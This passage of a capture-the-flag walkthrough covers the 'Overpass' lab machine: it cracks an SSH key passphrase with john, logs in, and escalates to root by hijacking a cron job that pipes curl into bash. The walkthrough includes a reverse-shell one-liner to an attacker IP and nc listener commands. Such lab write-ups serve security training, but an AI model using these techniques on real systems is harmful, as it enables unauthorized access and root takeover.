Next using ssh2john.py, to create a hash of the encrypted key.
$ /usr/share/john/ssh2john.py rsa_key > hash_key
Let's now use john to crack the hash.
$ john hash_key
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 3 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
james13 (rsa_key)
1g 0:00:00:02 DONE 3/3 (2023-12-06 19:32) 0.4132g/s 585384p/s 585384c/s 585384C/s jamest1..james24
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Let's give the rsa_key file elevated permissions.
$ sudo chmod 700 rsa_key
We can now login as james using the rsa_key.
$ ssh -i rsa_key james@10.10.114.146
Enter passphrase for key 'rsa_key':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-108-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed Dec 6 14:06:09 UTC 2023
System load: 0.0 Processes: 88
Usage of /: 22.3% of 18.57GB Users logged in: 0
Memory usage: 12% IP address for eth0: 10.10.114.146
Swap usage: 0%
47 packages can be updated.
0 updates are security updates.
Last login: Sat Jun 27 04:45:40 2020 from 192.168.170.1
james@overpass-prod:~$
We have to first check the contents in the directory.
Escalate your privileges and get the flag in root.txt
There was another file, called todo.txt. Let's see what is in it.
james@overpass-prod:~$ cat todo.txt
To Do:
> Update Overpass' Encryption, Muirland has been complaining that it's not strong enough
> Write down my password somewhere on a sticky note so that I don't forget it.
Wait, we make a password manager. Why don't I just use that?
> Test Overpass for macOS, it builds fine but I'm not sure it actually works
> Ask Paradox how he got the automated build script working and where the builds go.
They're not updating on the website
So we know that the builds are not going to the website.
Let's check the CRON jobs.
james@overpass-prod:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
We have to change the IP address that is mapped to overpass.thm to our IP address so that when the curl overpass.thm/downloads/src/buildscript.sh | bash command is run, it will run the file hosted by us.
Now we have to create the necessary directories inside /var/www/html/.
$ mkdir downloads
$ cd downloads
$ mkdir src
$ cd src
Now let's create a buildscript.sh file.
We need to include a reverse shell in it.
Let's restart apache2.
sh -i >& /dev/tcp/10.17.48.138/9999 0>&1
Finally we need to listen using nc. After a while, we will get the shell.
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.114.146] 49412
sh: 0: can't access tty; job control turned off
#
Let's read the root.txt file.
# ls
buildStatus
builds
go
root.txt
src
# cat root.txt
thm{7f336f8c359dbac18d54fdd64ea753bb}
